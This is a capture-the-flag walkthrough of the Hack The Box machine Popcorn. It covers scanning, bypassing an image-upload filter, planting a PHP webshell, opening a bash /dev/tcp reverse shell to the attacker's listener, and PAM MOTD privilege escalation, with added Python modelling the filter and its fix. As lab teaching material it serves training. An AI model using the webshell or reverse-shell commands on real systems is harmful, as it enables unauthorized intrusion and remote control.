
htb popcorn

Recon

nmap

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.6
nmap -p 22,80 -sC -sV -oA scans/tcpscripts 10.10.10.6
  • OpenSSH 5.1p1 and Apache httpd 2.2.12 are much older than Ubuntu Trusty 14.04; these versions match Ubuntu Karmic (9.10)

Directory discovery

# directory discovery
gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o scans/gobuster-root-med -t 40
  • gobuster finds /test (Status: 200), /index (Status: 200), /torrent (Status: 301) and /rename (Status: 301)
  • /test shows a PHP info page (phpinfo).
  • file_uploads is set to On.
  • the box may be vulnerable to Local File Inclusion (LFI).
  • /torrent lets you upload an image as a screenshot
  • the picture is saved under http://10.10.10.6/torrent/upload/

upload webshell

manipulate the upload to bypass the picture filters

    1. file extension (the server does not check this)
    2. Content-Type header (this filter is enforced on the server)
    3. magic bytes (not checked)

So the only real check is the header: intercept the upload in Burp Suite, change Content-Type to an image type, and put the PHP code before the PNG content.

<?php system($_REQUEST["cmd"]);?>
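To make the three checks above concrete, here is an added example (my own code, not the original post's and not the torrent site's source): a small model of the upload filter as the post observed it (only the Content-Type header is checked) next to an assumed hardened version that requires the extension, the header and the magic bytes to agree and rejects a PHP open tag in the body. The multipart form field name `file` and the sample "PNG" bytes are assumptions constructed for the demo.

```python
# Added example, not the Popcorn application's code: a model of the /torrent
# screenshot upload filter as observed on the box, beside an assumed fix.
from dataclasses import dataclass

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
GIF_MAGIC = (b"GIF87a", b"GIF89a")

# declared content type -> (required extension, accepted magic-byte prefixes)
ALLOWED_IMAGES = {
    "image/png": (".png", (PNG_MAGIC,)),
    "image/jpeg": (".jpg", (JPEG_MAGIC,)),
    "image/gif": (".gif", GIF_MAGIC),
}


@dataclass
class Upload:
    filename: str      # filename= of the multipart part, attacker controlled
    content_type: str  # Content-Type of the multipart part, attacker controlled
    data: bytes        # file body, attacker controlled


def weak_filter(up: Upload) -> bool:
    """The filter as observed on the box: only the Content-Type header is checked.
    Extension and magic bytes are ignored, so cmd.php sent as image/png passes."""
    return up.content_type in ALLOWED_IMAGES


def hardened_filter(up: Upload) -> bool:
    """Assumed fix: every attacker-controlled field must agree with each other,
    and the body must not carry a PHP open tag (PHP runs code anywhere in a file)."""
    entry = ALLOWED_IMAGES.get(up.content_type)
    if entry is None:
        return False
    ext, magics = entry
    name = up.filename.lower()
    # exactly one extension and it must match the declared type (blocks cmd.php, a.php.png)
    if name.count(".") != 1 or not name.endswith(ext):
        return False
    if not any(up.data.startswith(m) for m in magics):
        return False
    if b"<?" in up.data:
        return False
    return True


def build_multipart(up: Upload, boundary: str = "----burp", field: str = "file") -> bytes:
    """Render the part as Burp would send it. `field` is an assumed form name; the
    real field name of the torrent site is not recorded in the post."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{up.filename}"\r\n'
        f"Content-Type: {up.content_type}\r\n\r\n"
    ).encode()
    return head + up.data + f"\r\n--{boundary}--\r\n".encode()


# Constructed samples. The webshell is the post's payload followed by PNG bytes;
# the "PNG" is only a magic header plus filler, enough for a magic-bytes check.
WEBSHELL = Upload(
    filename="cmd.php",
    content_type="image/png",  # header changed in Burp Suite
    data=b'<?php system($_REQUEST["cmd"]);?>' + PNG_MAGIC + b"\x00" * 16,
)
LEGIT_PNG = Upload("screenshot.png", "image/png", PNG_MAGIC + b"\x00" * 16)
RENAMED_PHP = Upload("cmd.png", "image/png", b'<?php system($_REQUEST["cmd"]);?>')

if __name__ == "__main__":
    for label, up in [("webshell", WEBSHELL), ("legit png", LEGIT_PNG), ("renamed php", RENAMED_PHP)]:
        print(f"{label:12} weak={weak_filter(up)!s:5} hardened={hardened_filter(up)!s:5}")
    print(build_multipart(WEBSHELL).decode("latin-1"))
```

Even the hardened filter only limits what lands in the directory; the upload directory should additionally be served with PHP execution disabled (or stored outside the web root), since a filter bypass is exactly what this box demonstrates.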

upload

The uploaded cmd.php is renamed to a hash value, 0ba973670d943861fb9453eecefd3bf7d3054713.php.

execute

curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php?cmd=id

reverse shell

webshell

curl http://10.10.10.6/torrent/upload/0ba973670d943861fb9453eecefd3bf7d3054713.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.14/443 0>&1'"

attacker

nc -lnvp 443

upgrade the shell

python -c 'import pty;pty.spawn("bash")'
^Z
stty raw -echo
fg

privesc

Method 1: Linux PAM vulnerability

Show which programs use PAM:

$ ls /etc/pam.d
chfn            common-auth                     cron               login      polkit-1   samba  su-l
chpasswd        common-password                 lightdm            newusers   ppp        sshd   sudo
chsh            common-session                  lightdm-autologin  other      runuser    su
common-account  common-session-noninteractive   lightdm-greeter    passwd     runuser-l

The PAM module directory; the files in /etc/pam.d above are configured with modules from here:

/usr/lib/x86_64-linux-gnu/security

Listing the user's home directory with `find . -type f -ls`, the file `.cache/motd.legal-displayed` looks interesting.

  • Googling for “motd.legal-displayed privesc”
  • https://www.exploit-db.com/exploits/14339
  • Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation
  • PAM creates .cache/motd.legal-displayed in the user's home on login.
  • https://askubuntu.com/questions/256020/how-can-i-stop-the-automatic-creation-of-cache-motd-legal-displayed-file
  • sshd uses PAM for authentication, so to trigger the bug we need to log in to the box over SSH (as www-data).
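The last bullet is the reason SSH matters: the MOTD code path only runs for services whose PAM stack loads pam_motd.so. The following added example (my own code, not from the original post or the exploit-db entry) walks a pam.d directory and reports those services, following Debian-style `@include` stacking one level deep. The sample directory is constructed for the demo; run `pam_motd_services("/etc/pam.d")` on the target to check the real stack.

```python
# Added example, not part of the original post: list which PAM services load
# pam_motd.so, the module behind the MOTD privilege escalation referenced above.
import re
import tempfile
from pathlib import Path

MOTD_RE = re.compile(r"^[^#]*\bpam_motd\.so")  # module reference on a non-comment line
INCLUDE_RE = re.compile(r"^@include\s+(\S+)")  # Debian/Ubuntu stacking directive


def loads_pam_motd(path: Path, pamd: Path, depth: int = 0) -> bool:
    """True if this service file, or a file it @includes (one level), references pam_motd.so."""
    for line in path.read_text(errors="replace").splitlines():
        if MOTD_RE.match(line):
            return True
        m = INCLUDE_RE.match(line)
        if m and depth == 0:
            inc = pamd / m.group(1)
            if inc.is_file() and loads_pam_motd(inc, pamd, depth + 1):
                return True
    return False


def pam_motd_services(pamd: str) -> list[str]:
    """Sorted names of services under pamd whose stack runs pam_motd (the login paths to test)."""
    base = Path(pamd)
    return sorted(p.name for p in base.iterdir() if p.is_file() and loads_pam_motd(p, base))


def make_sample_pamd() -> str:
    """Constructed pam.d modelled on a 2009-era Ubuntu layout; not copied from the box."""
    d = Path(tempfile.mkdtemp())
    files = {
        "sshd": "@include common-auth\nsession optional pam_motd.so\n@include common-session\n",
        "login": "@include common-auth\nsession    optional   pam_motd.so\n",
        "su": "# session optional pam_motd.so\n@include common-session\n",  # commented out
        "cron": "@include common-account\nsession required pam_env.so\n",
        "sudo": "@include common-session\n",
        "common-auth": "auth required pam_unix.so\n",
        "common-session": "session required pam_unix.so\n",
        "common-account": "account required pam_unix.so\n",
    }
    for name, text in files.items():
        (d / name).write_text(text)
    return str(d)


if __name__ == "__main__":
    print(pam_motd_services(make_sample_pamd()))  # ['login', 'sshd']
```

On the sample, only `login` and `sshd` come back: `su` has the line commented out and `sudo`/`cron` never include a file that loads the module, which is why a shell obtained through the webshell is not enough and an SSH login is needed.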

Method 2: Dirty Cow

This post is licensed under CC BY 4.0 by the author.